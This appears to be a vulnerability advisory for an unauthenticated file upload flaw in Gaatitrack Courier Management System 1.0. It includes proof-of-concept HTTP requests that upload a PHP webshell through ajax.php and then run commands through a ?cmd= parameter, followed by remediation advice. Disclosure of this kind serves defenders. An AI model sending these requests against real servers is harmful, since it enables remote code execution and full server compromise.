## https://sploitus.com/exploit?id=EA46CCC0-825E-58E8-87D4-FE00DF28DA28
# Unauthenticated Arbitrary File Upload (RCE) in Gaatitrack Courier Management System 1.0
## 1. Vulnerability Details
- **Vendor:** Mayuri K.
- **Product:** Gaatitrack Courier Management System
- **Version:** 1.0
- **Vulnerability Type:** CWE-434: Unrestricted Upload of File with Dangerous Type
- **Severity:** Critical (Remote Code Execution)
## 2. Description
Gaatitrack Courier Management System 1.0 suffers from a severe Unauthenticated Arbitrary File Upload vulnerability. The application's core routing endpoint `ajax.php` fails to validate user session or authentication status before routing requests to backend classes.
Specifically, when the `action=update_user` parameter is called, the backend function uses `move_uploaded_file()` to save the user-supplied `img` payload without verifying its file extension, MIME type, or content. A remote, unauthenticated attacker can exploit this flaw by sending a crafted `multipart/form-data` HTTP request containing a malicious PHP script. The script is then saved to the `assets/uploads/` directory, allowing the attacker to execute arbitrary OS commands (RCE) and completely compromise the server.
## 3. Proof of Concept (PoC)
### Step 1: Send the Malicious Payload
The attacker sends the following unauthenticated HTTP POST request to the target server. Notice the strict formatting and the mandatory empty line between the HTTP headers and the `multipart/form-data` body. No `Cookie` or `Authorization` headers are required.
```http
POST /ajax.php?action=update_user HTTP/1.1
Host: gaatitrack
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPoCTest
Connection: close
------WebKitFormBoundaryPoCTest
Content-Disposition: form-data; name="firstname"
CVETest
------WebKitFormBoundaryPoCTest
Content-Disposition: form-data; name="lastname"
Test
------WebKitFormBoundaryPoCTest
Content-Disposition: form-data; name="email"
shell@cvetest.com
------WebKitFormBoundaryPoCTest
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/x-php
------WebKitFormBoundaryPoCTest--
```

### Step 2: Verify Remote Code Execution
The server processes the request and saves the PHP webshell. The attacker can then access the uploaded file via a web browser and execute system commands using the ?cmd= parameter.
**Request:**
```http
GET /assets/uploads/[Generated_Timestamp]_shell.php?cmd=whoami HTTP/1.1
Host: gaatitrack
```
**Result:**
The page successfully returns the output of the executed command (e.g., www-data, system, or the current active user), confirming that the remote code execution was successful.

## 4. Remediation
- Implement strict session and authentication validation at the beginning of ajax.php.
- Implement a strict whitelist of allowed file extensions (e.g., .jpg, .png) in the upload function.
- Validate the real file type using functions like finfo_file() or getimagesize().
- Disable PHP execution in the assets/uploads/ directory via web server configuration.